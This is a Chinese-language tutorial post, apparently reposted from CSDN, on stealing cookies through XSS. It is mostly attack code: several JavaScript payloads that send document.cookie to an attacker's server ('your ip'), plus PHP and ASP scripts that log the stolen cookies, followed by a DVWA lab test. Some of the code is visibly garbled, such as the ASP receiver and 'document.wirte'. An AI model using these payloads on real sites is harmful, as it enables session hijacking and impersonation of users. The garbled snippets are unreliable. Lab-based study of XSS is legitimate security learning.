0


xss盗取cookie原理剖析

虽然cookie信息经过加密,即使被网络上一些别有用心的人截获也不必担心,但现在遇到的问题,窃取cookie的人不需要知道字符的含义,直接利用cookie通过服务器验证就可以冒充用户的身份

假设一个网站有存储型xss(或反射xss),攻击者可以写入窃取cookie信息的恶意代码,在用户浏览xss网页时,触发恶意代码获取用户的cookie

攻击者通常使用以下语句盗取用户cookie信息

<script> document.location='http://your ip/cookie.php?cookie='+document.cookie; </script>

<img src='http://your ip/cookie.php?cookie='+document.cookie>

<script> new Image().src='http://your ip/cookie.php?cookie='+document.cookie; </script>
<script> img = new Image(); img.src='http://your ip/cookie.php?cookie='+document.cookie; img.width = 0; img.height = 0; </script>
<script> document.wirte(''); </script>

在远程服务器,接受cookie代码

PHP版本

<?php $cookie = $_GET['cookie']; $log = fopen("cookie.txt","a"); fwrite($log,$cookie."\n"); fclose($log); ?>

ASP版本

<%
msg=Request . ServerVariables ("QUERY STRING")
testfile=Server . MapPath ("cookie. txt")
setfs=server .Create0bject ("scripting. filesystemobject")set thisfile=fs . OpenTextFile(testfile,8, True, 0)
thisfile. Writeline ("" &msg& "")
thisfile.close
set fs = nothing
%>

用DVWA靶场测试

修改页面最大长度限制

131be766877d4519a93ad4000e02c08b.png

插入盗取cookie的恶意代码

f8da71f8018c413d9e720dcc140083eb.png

查看接受cookie文件,可见盗取成功

50822696e86b47948976a23eb778e01c.png

标签: xss web安全

本文转载自: https://blog.csdn.net/weixin_51692662/article/details/127407078
版权归原作者 安全~小菜鸡 所有, 如有侵权,请联系我们删除。

“xss盗取cookie原理剖析”的评论:

还没有评论